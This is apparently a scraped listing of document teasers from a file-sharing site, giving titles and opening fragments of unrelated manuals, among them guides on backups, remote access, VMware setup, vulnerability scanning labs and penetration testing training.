Secure Web Development Teaching Modules 1 Security Testing Contents 1 Concepts... 1 1.1 Security Practices for Software Verification... 1 1.2 Software Security Testing... 2 2 Labs Objectives... 2 3 Lab
More informationExtending Remote Desktop for Large Installations. Distributed Package Installs
Extending Remote Desktop for Large Installations This article describes four ways Remote Desktop can be extended for large installations. The four ways are: Distributed Package Installs, List Sharing,
More informationFAQ. How does the new Big Bend Backup (powered by Keepit) work?
FAQ How does the new Big Bend Backup (powered by Keepit) work? Once you establish which of the folders on your hard drive you ll be backing up, you ll log into myaccount.bigbend.net and from your control
More informationMarcum LLP MFT Guide
MFT Guide Contents 1. Logging In...3 2. Installing the Upload Wizard...4 3. Uploading Files Using the Upload Wizard...5 4. Downloading Files Using the Upload Wizard...8 5. Frequently Asked Questions...9
More informationIntroduction to Vulnerability Scanners Lab
Introduction to Vulnerability Scanners Lab Introduction: Lets take enumeration (and scanning) to the next level and automate what we have been doing manually. Lets use a tool that does just what we have
More informationSymantec Cyber Readiness Challenge Player s Manual
Symantec Cyber Readiness Challenge Player s Manual Version 1.6 January 20, 2014 Table of Contents Introduction... 3 1 The Cyber Readiness Challenge... 4 1.1 Your Credentials... 4 1.2 Accessing the Competition...
More informationSetting up VMware ESXi for 2X VirtualDesktopServer Manual
Setting up VMware ESXi for 2X VirtualDesktopServer Manual URL: www.2x.com E-mail: info@2x.com Information in this document is subject to change without notice. Companies, names, and data used in examples
More informationNAS 224 Remote Access Manual Configuration
NAS 224 Remote Access Manual Configuration Connect to your ASUSTOR NAS through the Internet A S U S T O R C O L L E G E COURSE OBJECTIVES Upon completion of this course you should be able to: 1. Configure
More informationAudience. Pre-Requisites
T R A N C H U L A S W O R K S H O P S A N D T R A I N I N G S Hands-On Penetration Testing Training Course About Tranchulas Tranchulas is a multinational information security company having its offices
More informationThe Web Pro Miami, Inc. 615 Santander Ave, Unit C Coral Gables, FL 33134 6505. T: 786.273.7774 info@thewebpro.com www.thewebpro.
615 Santander Ave, Unit C Coral Gables, FL 33134 6505 T: 786.273.7774 info@thewebpro.com www.thewebpro.com for v.1.06 and above Web Pro Manager is an open source website management platform that is easy
More informationNovaBACKUP xsp Version 15.0 Upgrade Guide
NovaBACKUP xsp Version 15.0 Upgrade Guide NovaStor / November 2013 2013 NovaStor, all rights reserved. All trademarks are the property of their respective owners. Features and specifications are subject
More information